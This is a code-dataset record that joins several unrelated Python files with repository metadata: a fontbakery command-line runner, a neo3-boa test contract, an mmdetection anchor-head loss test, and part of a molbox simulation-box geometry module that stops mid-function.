    tr = TerminalReporter(runner=runner, is_async=False
                          , print_progress=not args.no_progress
                          , check_threshold=loglevel
                          , log_threshold=args.loglevel_messages or loglevel
                          , usecolor=not args.no_colors
                          , collect_results_by=args.gather_by
                          , skip_status_report=None if args.show_sections\
                                                 else (STARTSECTION, ENDSECTION)
                          )
    reporters = [tr.receive]

    # Optional file reporters, one per requested output format.
    if args.json:
        sr = SerializeReporter(runner=runner, collect_results_by=args.gather_by)
        reporters.append(sr.receive)

    if args.ghmarkdown:
        mdr = GHMarkdownReporter(loglevels=args.loglevels,
                                 runner=runner,
                                 collect_results_by=args.gather_by)
        reporters.append(mdr.receive)

    if args.html:
        hr = HTMLReporter(loglevels=args.loglevels,
                          runner=runner,
                          collect_results_by=args.gather_by)
        reporters.append(hr.receive)

    # Execute all checks once, fanning each event out to every reporter.
    distribute_generator(runner.run(), reporters)

    if args.json:
        import json
        json.dump(sr.getdoc(), args.json, sort_keys=True, indent=4)
        print("A report in JSON format has been"
              " saved to '{}'".format(args.json.name))

    if args.ghmarkdown:
        args.ghmarkdown.write(mdr.get_markdown())
        print("A report in GitHub Markdown format which can be useful\n"
              " for posting issues on a GitHub issue tracker has been\n"
              " saved to '{}'".format(args.ghmarkdown.name))

    if args.html:
        args.html.write(hr.get_html())
        print(f"A report in HTML format has been saved to '{args.html.name}'")

    # Fail and error let the command fail
    return 1 if tr.worst_check_status in (ERROR, FAIL) else 0


if __name__ == '__main__':
    sys.exit(main())
| 37.878594 | 102 | 0.609565 |
import argparse
import importlib.util
import os
import sys
from collections import OrderedDict
from fontbakery.checkrunner import (
distribute_generator
, CheckRunner
, ValueValidationError
, Spec
, get_module_specification
, DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
, STARTSECTION
, ENDSECTION
)
log_levels = OrderedDict((s.name,s) for s in sorted((
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)))
DEFAULT_LOG_LEVEL = WARN
from fontbakery.reporters.terminal import TerminalReporter
from fontbakery.reporters.serialize import SerializeReporter
from fontbakery.reporters.ghmarkdown import GHMarkdownReporter
from fontbakery.reporters.html import HTMLReporter
def ArgumentParser(specification, spec_arg=True):
    """Create the fontbakery command line argument parser.

    Returns ``(argument_parser, values_keys)`` where ``values_keys`` lists
    the custom value names registered by ``specification.setup_argparse``.
    """
    argument_parser = argparse.ArgumentParser(
        description="Check TTF files against a specification.",
        formatter_class=argparse.RawTextHelpFormatter)

    if spec_arg:
        argument_parser.add_argument(
            'specification',
            help='File/Module name, must define a fontbakery "specification".')

    values_keys = specification.setup_argparse(argument_parser)

    argument_parser.add_argument(
        "-c",
        "--checkid",
        action="append",
        help=(
            "Explicit check-ids (or parts of their name) to be executed. "
            "Use this option multiple times to select multiple checks."
        ),
    )

    argument_parser.add_argument(
        "-x",
        "--exclude-checkid",
        action="append",
        help=(
            "Exclude check-ids (or parts of their name) from execution. "
            "Use this option multiple times to exclude multiple checks."
        ),
    )

    def log_levels_get(key):
        # argparse ``type=`` callable: map a status name to its Status object.
        if key in log_levels:
            return log_levels[key]
        raise argparse.ArgumentTypeError('Key "{}" must be one of: {}.'.format(
            key, ', '.join(log_levels.keys())))

    argument_parser.add_argument('-v', '--verbose', dest='loglevels', const=PASS,
                                 action='append_const',
                                 help='Shortcut for `-l PASS`.\n')

    argument_parser.add_argument('-l', '--loglevel', dest='loglevels',
                                 type=log_levels_get,
                                 action='append',
                                 metavar='LOGLEVEL',
                                 help='Report checks with a result of this status or higher.\n'
                                      'One of: {}.\n'
                                      '(default: {})'.format(
                                          ', '.join(log_levels.keys()),
                                          DEFAULT_LOG_LEVEL.name))

    argument_parser.add_argument('-m', '--loglevel-messages', default=None,
                                 type=log_levels_get,
                                 help=('Report log messages of this status or higher.\n'
                                       'Messages are all status lines within a check.\n'
                                       'One of: {}.\n'
                                       '(default: LOGLEVEL)'
                                       ).format(', '.join(log_levels.keys())))

    # These two are rendered with terminal escape codes, which the default
    # Windows terminal cannot display; main() forces them off on win32.
    if sys.platform != "win32":
        argument_parser.add_argument(
            '-n',
            '--no-progress',
            action='store_true',
            help='In a tty as stdout, don\'t render the progress indicators.')

        argument_parser.add_argument(
            '-C',
            '--no-colors',
            action='store_true',
            help='No colors for tty output.')

    argument_parser.add_argument('-S', '--show-sections', default=False,
                                 action='store_true',
                                 help='Show section start and end info plus summary.')

    argument_parser.add_argument('-L', '--list-checks', default=False,
                                 action='store_true',
                                 help='List the checks available in the selected specification.')

    argument_parser.add_argument('--json', default=False, type=argparse.FileType('w'),
                                 metavar='JSON_FILE',
                                 help='Write a json formatted report to JSON_FILE.')

    argument_parser.add_argument('--ghmarkdown', default=False, type=argparse.FileType('w'),
                                 metavar='MD_FILE',
                                 help='Write a GitHub-Markdown formatted report to MD_FILE.')

    argument_parser.add_argument('--html', default=False,
                                 type=argparse.FileType('w', encoding="utf-8"),
                                 metavar='HTML_FILE',
                                 help='Write a HTML report to HTML_FILE.')

    iterargs = sorted(specification.iterargs.keys())

    gather_by_choices = iterargs + ['*check']
    argument_parser.add_argument('-g', '--gather-by', default=None,
                                 metavar='ITERATED_ARG',
                                 choices=gather_by_choices,
                                 type=str,
                                 help='Optional: collect results by ITERATED_ARG\n'
                                      'In terminal output: create a summary counter for each ITERATED_ARG.\n'
                                      'In json output: structure the document by ITERATED_ARG.\n'
                                      'One of: {}'.format(', '.join(gather_by_choices))
                                 )

    def parse_order(arg):
        # Bug fix: the old ``filter(...)`` object is always truthy (even when
        # it would yield nothing) and can only be iterated once, so
        # ``order or None`` never returned None and consumers received a
        # lazy single-use iterator instead of a list.
        order = [n.strip() for n in arg.split(',') if n.strip()]
        return order or None

    argument_parser.add_argument('-o', '--order', default=None, type=parse_order,
                                 help='Comma separated list of order arguments.\n'
                                      'The execution order is determined by the order of the check\n'
                                      'definitions and by the order of the iterable arguments.\n'
                                      'A section defines its own order. `--order` can be used to\n'
                                      'override the order of *all* sections.\n'
                                      'Despite the ITERATED_ARGS there are two special\n'
                                      'values available:\n'
                                      '"*iterargs" -- all remainig ITERATED_ARGS\n'
                                      '"*check" -- order by check\n'
                                      'ITERATED_ARGS: {}\n'
                                      'A sections default is equivalent to: "*iterargs, *check".\n'
                                      'A common use case is `-o "*check"` when checking the whole \n'
                                      'collection against a selection of checks picked with `--checkid`.'
                                      ''.format(', '.join(iterargs))
                                 )
    return argument_parser, values_keys
class ArgumentParserError(Exception):
    """Raised by ThrowingArgumentParser in place of argparse's sys.exit()."""
class ThrowingArgumentParser(argparse.ArgumentParser):
    """ArgumentParser variant that raises instead of exiting on bad input."""

    def error(self, message):
        # argparse's default error() prints usage and calls sys.exit();
        # raising lets callers recover (see get_spec).
        raise ArgumentParserError(message)
def get_module_from_file(filename):
    """Import a python file from an arbitrary path and return the module.

    e.g. ``my/path/to/file.py`` is loaded under the synthetic module name
    ``file_module.file_py``.
    """
    basename = os.path.basename(filename).replace('.', '_')
    module_name = 'file_module.{}'.format(basename)
    module_spec = importlib.util.spec_from_file_location(module_name, filename)
    loaded = importlib.util.module_from_spec(module_spec)
    module_spec.loader.exec_module(loaded)
    return loaded
def get_module(name):
    """Resolve *name* to a module.

    A file that exists on disk is loaded from its path; otherwise *name*
    is imported as a regular dotted module name.
    """
    if not os.path.isfile(name):
        from importlib import import_module
        # Fails with an appropriate ImportError for unknown modules.
        return import_module(name, package=None)
    # An existing file wins over an importable module of the same name.
    return get_module_from_file(name)
def get_spec():
    """Prefetch the specification module, to fill some holes in the help text."""
    # Minimal throwaway parser: only the positional ``specification``
    # argument is needed before the real parser (which depends on the spec
    # itself) can be built. parse_known_args reads sys.argv.
    argument_parser = ThrowingArgumentParser(add_help=False)
    argument_parser.add_argument('specification')
    try:
        args, _ = argument_parser.parse_known_args()
    except ArgumentParserError:
        # silently fails, the main parser will show usage string.
        return Spec()
    imported = get_module(args.specification)
    specification = get_module_specification(imported)
    if not specification:
        raise Exception(f"Can't get a specification from {imported}.")
    return specification
# Alias kept for backwards compatibility (e.g. check-commands, FontBakery
# Dashboard); the function of this name previously just forwarded to CheckRunner.
runner_factory = CheckRunner
def main(specification=None, values=None):
add_spec_arg = False
if specification is None:
specification = get_spec()
add_spec_arg = True
argument_parser, values_keys = ArgumentParser(specification, spec_arg=add_spec_arg)
args = argument_parser.parse_args()
if args.list_checks:
print('Available checks')
for section_name, section in specification._sections.items():
checks = section.list_checks()
message = "# {}:\n {}".format(section_name,"\n ".join(checks))
print(message)
sys.exit()
values_ = {}
if values is not None:
values_.update(values)
# values_keys are returned by specification.setup_argparse
# these are keys for custom arguments required by the spec.
if values_keys:
for key in values_keys:
if hasattr(args, key):
values_[key] = getattr(args, key)
try:
runner = CheckRunner(specification
, values=values_
, custom_order=args.order
, explicit_checks=args.checkid
, exclude_checks=args.exclude_checkid
)
except ValueValidationError as e:
print(e)
argument_parser.print_usage()
sys.exit(1)
# The default Windows Terminal just displays the escape codes. The argument
# parser above therefore has these options disabled.
if sys.platform == "win32":
args.no_progress = True
args.no_colors = True
# the most verbose loglevel wins
loglevel = min(args.loglevels) if args.loglevels else DEFAULT_LOG_LEVEL
tr = TerminalReporter(runner=runner, is_async=False
, print_progress=not args.no_progress
, check_threshold=loglevel
, log_threshold=args.loglevel_messages or loglevel
, usecolor=not args.no_colors
, collect_results_by=args.gather_by
, skip_status_report=None if args.show_sections\
else (STARTSECTION, ENDSECTION)
)
reporters = [tr.receive]
if args.json:
sr = SerializeReporter(runner=runner, collect_results_by=args.gather_by)
reporters.append(sr.receive)
if args.ghmarkdown:
mdr = GHMarkdownReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(mdr.receive)
if args.html:
hr = HTMLReporter(loglevels=args.loglevels,
runner=runner,
collect_results_by=args.gather_by)
reporters.append(hr.receive)
distribute_generator(runner.run(), reporters)
if args.json:
import json
json.dump(sr.getdoc(), args.json, sort_keys=True, indent=4)
print("A report in JSON format has been"
" saved to '{}'".format(args.json.name))
if args.ghmarkdown:
args.ghmarkdown.write(mdr.get_markdown())
print("A report in GitHub Markdown format which can be useful\n"
" for posting issues on a GitHub issue tracker has been\n"
" saved to '{}'".format(args.ghmarkdown.name))
if args.html:
args.html.write(hr.get_html())
print(f"A report in HTML format has been saved to '{args.html.name}'")
# Fail and error let the command fail
return 1 if tr.worst_check_status in (ERROR, FAIL) else 0
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c3055259508571a6bfa3a791d078170adfa3371 | 139 | py | Python | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/string_test/IndexString.py | CityOfZion/neo3-boa | c31fadce597abd5e0bdea76985e35c7004ab9d39 | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin import public
@public
def main(a: str, value: str, start: int, end: int) -> int:
return a.index(value, start, end)
| 19.857143 | 58 | 0.676259 | from boa3.builtin import public
@public
def main(a: str, value: str, start: int, end: int) -> int:
return a.index(value, start, end)
| true | true |
1c3055cfcfa3a11de3c09866da49b3354f0d6f0d | 2,551 | py | Python | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_dense_heads/test_anchor_head.py | hyperlist/mmdetection | ba4918de7fb21a96edc373584fa21a17d098a843 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import paddle
from mmdet.models.dense_heads import AnchorHead
def test_anchor_head_loss():
    """Tests anchor head loss when truth is empty and non-empty."""
    # Bug fix: the original mixed two tensor libraries -- ``paddle.rand`` /
    # ``paddle.empty`` alongside ``torch.LongTensor`` / ``torch.Tensor``
    # (a NameError at runtime, since torch was never imported). mmdet is a
    # PyTorch framework, so use torch consistently.
    import torch

    s = 256
    img_metas = [{
        'img_shape': (s, s, 3),
        'scale_factor': 1,
        'pad_shape': (s, s, 3)
    }]

    cfg = mmcv.Config(
        dict(
            assigner=dict(
                type='MaxIoUAssigner',
                pos_iou_thr=0.7,
                neg_iou_thr=0.3,
                min_pos_iou=0.3,
                match_low_quality=True,
                ignore_iof_thr=-1),
            sampler=dict(
                type='RandomSampler',
                num=256,
                pos_fraction=0.5,
                neg_pos_ub=-1,
                add_gt_as_proposals=False),
            allowed_border=0,
            pos_weight=-1,
            debug=False))
    self = AnchorHead(num_classes=4, in_channels=1, train_cfg=cfg)

    # Anchor head expects multiple levels of features per image.
    feat = [
        torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
        for i in range(len(self.anchor_generator.strides))
    ]
    cls_scores, bbox_preds = self.forward(feat)

    # Test that empty ground truth encourages the network to predict background
    gt_bboxes = [torch.empty((0, 4))]
    gt_labels = [torch.LongTensor([])]
    gt_bboxes_ignore = None
    empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
                                img_metas, gt_bboxes_ignore)
    # When there is no truth, the cls loss should be nonzero but there should
    # be no box loss.
    empty_cls_loss = sum(empty_gt_losses['loss_cls'])
    empty_box_loss = sum(empty_gt_losses['loss_bbox'])
    assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert empty_box_loss.item() == 0, (
        'there should be no box loss when there are no true boxes')

    # When truth is non-empty then both cls and box loss should be nonzero for
    # random inputs
    gt_bboxes = [
        torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
    ]
    gt_labels = [torch.LongTensor([2])]
    one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
                              img_metas, gt_bboxes_ignore)
    onegt_cls_loss = sum(one_gt_losses['loss_cls'])
    onegt_box_loss = sum(one_gt_losses['loss_bbox'])
    assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
| 35.929577 | 79 | 0.602901 |
import mmcv
import paddle
from mmdet.models.dense_heads import AnchorHead
def test_anchor_head_loss():
    """Tests anchor head loss when truth is empty and non-empty."""
    # Bug fix: the original mixed two tensor libraries -- ``paddle.rand`` /
    # ``paddle.empty`` alongside ``torch.LongTensor`` / ``torch.Tensor``
    # (a NameError at runtime, since torch was never imported). mmdet is a
    # PyTorch framework, so use torch consistently.
    import torch

    s = 256
    img_metas = [{
        'img_shape': (s, s, 3),
        'scale_factor': 1,
        'pad_shape': (s, s, 3)
    }]

    cfg = mmcv.Config(
        dict(
            assigner=dict(
                type='MaxIoUAssigner',
                pos_iou_thr=0.7,
                neg_iou_thr=0.3,
                min_pos_iou=0.3,
                match_low_quality=True,
                ignore_iof_thr=-1),
            sampler=dict(
                type='RandomSampler',
                num=256,
                pos_fraction=0.5,
                neg_pos_ub=-1,
                add_gt_as_proposals=False),
            allowed_border=0,
            pos_weight=-1,
            debug=False))
    self = AnchorHead(num_classes=4, in_channels=1, train_cfg=cfg)

    # Anchor head expects multiple levels of features per image.
    feat = [
        torch.rand(1, 1, s // (2**(i + 2)), s // (2**(i + 2)))
        for i in range(len(self.anchor_generator.strides))
    ]
    cls_scores, bbox_preds = self.forward(feat)

    # Empty ground truth: cls loss must be non-zero, box loss must be zero.
    gt_bboxes = [torch.empty((0, 4))]
    gt_labels = [torch.LongTensor([])]
    gt_bboxes_ignore = None
    empty_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
                                img_metas, gt_bboxes_ignore)
    empty_cls_loss = sum(empty_gt_losses['loss_cls'])
    empty_box_loss = sum(empty_gt_losses['loss_bbox'])
    assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert empty_box_loss.item() == 0, (
        'there should be no box loss when there are no true boxes')

    # Non-empty ground truth: both losses must be non-zero.
    gt_bboxes = [
        torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
    ]
    gt_labels = [torch.LongTensor([2])]
    one_gt_losses = self.loss(cls_scores, bbox_preds, gt_bboxes, gt_labels,
                              img_metas, gt_bboxes_ignore)
    onegt_cls_loss = sum(one_gt_losses['loss_cls'])
    onegt_box_loss = sum(one_gt_losses['loss_bbox'])
    assert onegt_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert onegt_box_loss.item() > 0, 'box loss should be non-zero'
| true | true |
1c3056485d96010aa6fa7acc377a2f817a61f3c8 | 14,477 | py | Python | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-29T16:37:24.000Z | 2021-09-15T23:18:35.000Z | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-29T16:41:07.000Z | 2021-07-01T14:41:49.000Z | molbox/box.py | daico007/molbox | 0cd18b1400ef1b0e1b5331b92aeb36af3465d425 | [
"MIT"
] | 2 | 2021-06-28T20:57:59.000Z | 2021-06-29T16:37:28.000Z | """generic box module."""
from warnings import warn
import numpy as np
__all__ = ["Box", "BoxError"]
class BoxError(Exception):
    """Raised when a Box cannot be constructed or validated."""
class Box(object):
"""A box representing the bounds of the system.
Parameters
----------
lengths : list-like, shape=(3,), dtype=float
Lengths of the edges of the box.
angles : list-like, shape=(3,), dtype=float, default=None
Angles (in degrees) that define the tilt of the edges of the box. If
None is given, angles are assumed to be [90.0, 90.0, 90.0]. These are
also known as alpha, beta, gamma in the crystallography community.
precision : int, optional, default=None
Control the precision of the floating point representation of box
attributes. If none provided, the default is 6 decimals.
Attributes
----------
vectors : np.ndarray, shape=(3,3), dtype=float
Vectors that define the parallelepiped (Box).
lengths : tuple, shape=(3,), dtype=float
Lengths of the box in x,y,z
angles : tuple, shape=(3,), dtype=float
Angles defining the tilt of the box.
Lx : float
Length of the Box in the x dimension
Ly : float
Length of the Box in the y dimension
Lz : float
Length of the Box in the z dimension
xy : float
Tilt factor needed to displace an orthogonal box's xy face to its
parallelepiped structure.
xz : float
Tilt factor needed to displace an orthogonal box's xz face to its
parallelepiped structure.
yz : float
Tilt factor needed to displace an orthogonal box's yz face to its
parallelepiped structure.
precision : int
Precision of the floating point numbers when accessing values.
Notes
-----
Box vectors are expected to be provided in row-major format.
"""
    def __init__(self, lengths, angles=None, precision=None):
        # Floating point rounding precision for reported values; default 6.
        if precision is not None:
            self._precision = int(precision)
        else:
            self._precision = 6

        # An orthogonal box unless tilt angles are supplied.
        if angles is None:
            angles = [90.0, 90.0, 90.0]

        # Canonical state is the 3x3 row-major vector matrix; the cached
        # lengths and tilt factors below are derived from it.
        self._vectors = _lengths_angles_to_vectors(
            lengths=lengths, angles=angles, precision=self.precision
        )

        (Lx, Ly, Lz, xy, xz, yz) = self._from_vecs_to_lengths_tilt_factors()
        self._Lx = Lx
        self._Ly = Ly
        self._Lz = Lz
        self._xy = xy
        self._xz = xz
        self._yz = yz
    @classmethod
    def from_lengths_angles(cls, lengths, angles, precision=None):
        """Generate a box from edge lengths and tilt angles (degrees)."""
        return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_uvec_lengths(cls, uvec, lengths, precision=None):
"""Generate a box from unit vectors and lengths."""
uvec = np.asarray(uvec)
uvec.reshape(3, 3)
if not np.allclose(np.linalg.norm(uvec, axis=1), 1.0):
raise BoxError(
"Unit vector magnitudes provided are not close to 1.0, "
f"magnitudes: {np.linalg.norm(uvec, axis=1)}"
)
lengths = np.asarray(lengths)
lengths.reshape(1, 3)
_validate_box_vectors(uvec)
scaled_vec = (uvec.T * lengths).T
(alpha, beta, gamma) = _calc_angles(scaled_vec)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_mins_maxs_angles(cls, mins, maxs, angles, precision=None):
"""Generate a box from min/max distance calculations and angles."""
(x_min, y_min, z_min) = mins
(x_max, y_max, z_max) = maxs
lengths = (x_max - x_min, y_max - y_min, z_max - z_min)
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_vectors(cls, vectors, precision=None):
"""Generate a box from box vectors."""
vectors = _validate_box_vectors(vectors)
(alpha, beta, gamma) = _calc_angles(vectors)
v1 = vectors[0, :]
v2 = vectors[1, :]
v3 = vectors[2, :]
Lx = np.linalg.norm(v1)
Ly = np.linalg.norm(v2)
Lz = np.linalg.norm(v3)
lengths = (Lx, Ly, Lz)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_lengths_tilt_factors(
cls, lengths, tilt_factors=None, precision=None
):
"""Generate a box from box lengths and tilt factors."""
(Lx, Ly, Lz) = lengths
if tilt_factors is None:
(xy, xz, yz) = (0.0, 0.0, 0.0)
else:
(xy, xz, yz) = tilt_factors
vecs = np.asarray(
[[Lx, 0.0, 0.0], [Ly * xy, Ly, 0.0], [Lz * xz, Lz * yz, Lz]]
)
(alpha, beta, gamma) = _calc_angles(vecs)
return cls(
lengths=lengths, angles=[alpha, beta, gamma], precision=precision
)
@classmethod
def from_lo_hi_tilt_factors(cls, lo, hi, tilt_factors, precision=None):
"""Generate a box from a lo, hi convention and tilt factors."""
(xlo, ylo, zlo) = lo
(xhi, yhi, zhi) = hi
(xy, xz, yz) = tilt_factors
xlo_bound = xlo + min([0.0, xy, xz, xy + xz])
xhi_bound = xhi + max([0.0, xy, xz, xy + xz])
ylo_bound = ylo + min([0.0, yz])
yhi_bound = yhi + max([0.0, yz])
lengths = [xhi_bound - xlo_bound, yhi_bound - ylo_bound, zhi - zlo]
return cls.from_lengths_tilt_factors(
lengths=lengths, tilt_factors=tilt_factors
)
@property
def vectors(self):
    """Box representation as a 3x3 matrix (one box vector per row)."""
    return self._vectors
@property
def box_parameters(self):
    """Lengths and tilt factors of the box: (Lx, Ly, Lz, xy, xz, yz)."""
    # Bug fix: the last element was ``self.xy`` repeated instead of
    # ``self.yz`` (see the (…, xy, xz, yz) unpacking in ``__repr__``).
    return self.Lx, self.Ly, self.Lz, self.xy, self.xz, self.yz
@property
def Lx(self):
    """Box edge length along x, rounded to ``precision`` decimals."""
    return round(self._Lx, self.precision)
@property
def Ly(self):
    """Box edge length along y, rounded to ``precision`` decimals."""
    return round(self._Ly, self.precision)
@property
def Lz(self):
    """Box edge length along z, rounded to ``precision`` decimals."""
    return round(self._Lz, self.precision)
@property
def lengths(self):
    """Tuple of the three box edge lengths (Lx, Ly, Lz)."""
    return self.Lx, self.Ly, self.Lz
@property
def xy(self):
    """Tilt factor xy of the box, rounded to ``precision`` decimals."""
    return round(self._xy, self.precision)
@property
def xz(self):
    """Tilt factor xz of the box, rounded to ``precision`` decimals."""
    return round(self._xz, self.precision)
@property
def yz(self):
    """Tilt factor yz of the box, rounded to ``precision`` decimals."""
    return round(self._yz, self.precision)
@property
def tilt_factors(self):
    """Tuple of the three tilt factors (xy, xz, yz) of the box."""
    return self.xy, self.xz, self.yz
@property
def angles(self):
    """Box tilt angles (alpha, beta, gamma) in degrees, rounded to precision."""
    raw = self._get_angles()
    return tuple(round(angle, self.precision) for angle in raw)
@property
def precision(self):
    """Number of decimal places used when reporting box values."""
    return self._precision
@precision.setter
def precision(self, value):
    """Set the decimal precision; ``None`` means full (16-digit) precision.

    Bug fix: the old truthiness test (``if not value``) silently mapped a
    legitimate ``precision = 0`` to 16.  Per the documented contract, only
    ``None`` selects the 16-digit default.
    """
    self._precision = 16 if value is None else int(value)
@property
def bravais_parameters(self):
    """Return the Box representation as Bravais lattice parameters.

    Returns
    -------
    parameters : tuple of floats
        (a, b, c, alpha, beta, gamma) -- the edge lengths of the box
        followed by the tilt angles of the parallelepiped, in degrees.
    """
    # ``lengths`` and ``angles`` are both tuples already.
    return self.lengths + self.angles
def __repr__(self):
    """Return a string representation of the box."""
    fmt = f".{self._precision}f" if self._precision else ""
    (Lx, Ly, Lz, xy, xz, yz) = self.box_parameters
    fields = [
        f"Lx={Lx:{fmt}}",
        f"Ly={Ly:{fmt}}",
        f"Lz={Lz:{fmt}}",
        f"xy={xy:{fmt}}",
        f"xz={xz:{fmt}}",
        f"yz={yz:{fmt}}",
    ]
    # NOTE: trailing ", " after the last field matches the historic output.
    return "Box: " + ", ".join(fields) + ", "
def _from_vecs_to_lengths_tilt_factors(self):
    """Derive (len_x, len_y, len_z, xy, xz, yz) from ``self._vectors``.

    NOTE: the returned lengths are the *full* vector magnitudes; the
    projected Lx/Ly/Lz below are used only to obtain the tilt factors.
    """
    # vectors should already be aligned by _normalize_box
    v = np.zeros((3, 3))
    v[0, :] = self._vectors[0, :]
    v[1, :] = self._vectors[1, :]
    v[2, :] = self._vectors[2, :]
    # Projected (reduced-form) lengths, used only for the tilt factors.
    Lx = np.sqrt(np.dot(v[0], v[0]))
    a2x = np.dot(v[0], v[1]) / Lx
    Ly = np.sqrt(np.dot(v[1], v[1]) - a2x * a2x)
    xy = a2x / Ly
    v0xv1 = np.cross(v[0], v[1])
    v0xv1mag = np.sqrt(np.dot(v0xv1, v0xv1))
    # Lz here is the projection of v[2] onto the v[0] x v[1] normal.
    Lz = np.dot(v[2], v0xv1) / v0xv1mag
    a3x = np.dot(v[0], v[2]) / Lx
    xz = a3x / Lz
    yz = (np.dot(v[1], v[2]) - a2x * a3x) / (Ly * Lz)
    # Full edge lengths (vector magnitudes) reported to the caller.
    len_x = np.sqrt(np.dot(v[0], v[0]))
    len_y = np.sqrt(np.dot(v[1], v[1]))
    len_z = np.sqrt(np.dot(v[2], v[2]))
    return len_x, len_y, len_z, xy, xz, yz
def _get_angles(self):
    """Return the (alpha, beta, gamma) angles of the current box vectors."""
    return _calc_angles(self.vectors)
def _validate_box_vectors(box_vectors):
    """Coerce box vectors into a 3x3 float matrix in our convention.

    The conventions the Box class adheres to:

    1. A 3x3 matrix coercible into a numpy array of floats
    2. Vectors in a right-handed basis (determinant of matrix is positive)
    3. The first vector aligned along the [1, 0, 0] direction
    4. The second vector aligned in the xy plane
    5. The third vector free in the x, y and +z directions

    Left-handed or unaligned input is transformed (with a warning) by
    ``_normalize_box``.
    """
    vecs = np.asarray(box_vectors, dtype=np.float64)
    # Bug fix: ``ndarray.reshape`` is not in-place and its result was being
    # discarded; bind it so a flat 9-element input really becomes 3x3
    # (and a wrong-sized input raises ValueError here, not deeper down).
    vecs = vecs.reshape(3, 3)
    return _normalize_box(vecs)
def _lengths_angles_to_vectors(lengths, angles, precision):
    """Construct a 3x3 row-major box matrix from lengths and angles.

    Parameters
    ----------
    lengths : sequence of three floats, the (a, b, c) edge lengths
    angles : sequence of three floats, (alpha, beta, gamma) in degrees
    precision : int
        Number of decimals the resulting matrix is rounded to.
    """
    (a, b, c) = lengths
    (alpha, beta, gamma) = np.deg2rad(angles)
    # Clip guards against round-off pushing cos/sin outside [-1, 1].
    cos_a = np.clip(np.cos(alpha), -1.0, 1.0)
    cos_b = np.clip(np.cos(beta), -1.0, 1.0)
    cos_g = np.clip(np.cos(gamma), -1.0, 1.0)
    sin_g = np.clip(np.sin(gamma), -1.0, 1.0)
    a_vec = np.asarray([a, 0.0, 0.0])
    b_vec = np.asarray([b * cos_g, b * sin_g, 0.0])
    c_x = c * cos_b
    c_cos_y_term = (cos_a - (cos_b * cos_g)) / sin_g
    c_y = c * c_cos_y_term
    c_z = c * np.sqrt(1 - np.square(cos_b) - np.square(c_cos_y_term))
    c_vec = np.asarray([c_x, c_y, c_z])
    # Already 3x3 by construction; the previous no-op ``reshape`` call
    # (whose result was discarded) and the unused sin(alpha)/sin(beta)
    # locals have been removed.
    box_vectors = np.asarray((a_vec, b_vec, c_vec))
    # Validation only; raises/warns on degenerate or left-handed input.
    _validate_box_vectors(box_vectors=box_vectors)
    return box_vectors.round(precision)
def _normalize_box(vectors):
    """Align the box matrix into a right-handed coordinate frame.

    NOTE: This assumes that the matrix is in a row-major format.

    NOTE: Inspiration and logic are from the Glotzer group package, Garnett;
    which is provided under a BSD 3-clause License.
    For additional information, refer to the License file provided with this
    package.
    """
    det = np.linalg.det(vectors)
    # Co-linear (degenerate) vectors span no volume and cannot form a box.
    if np.isclose(det, 0.0, atol=1e-5):
        raise BoxError(
            "The vectors to define the box are co-linear, this does not form a "
            f"3D region in space.\n Box vectors evaluated: {vectors}"
        )
    if det < 0.0:
        warn(
            "Box vectors provided for a left-handed basis, these will be "
            "transformed into a right-handed basis automatically."
        )
    # transpose to column-major for the time being
    Q, R = np.linalg.qr(vectors.T)
    # left or right handed: det<0 left, >0, right
    sign = np.linalg.det(Q)
    R = R * sign
    # Flip any column of R whose diagonal entry is negative so the
    # projected lengths on the diagonal come out positive.
    signs = np.diag(
        np.diag(np.where(R < 0, -np.ones(R.shape), np.ones(R.shape)))
    )
    transformed_vecs = R.dot(signs)
    return _reduced_form_vectors(transformed_vecs.T)
def _reduced_form_vectors(box_vectors):
"""Get reduced vectors from vectors.
Adapted from HOOMD-Blue's documentation on periodic boundary conditions:
https://hoomd-blue.readthedocs.io/en/stable/box.html
"""
v1 = box_vectors[0, :]
v2 = box_vectors[1, :]
v3 = box_vectors[2, :]
lx = np.linalg.norm(v1)
a_2x = np.dot(v1, v2) / lx
ly = np.sqrt(np.dot(v2, v2) - a_2x * a_2x)
xy = a_2x / ly
v1_x_v2 = np.cross(v1, v2)
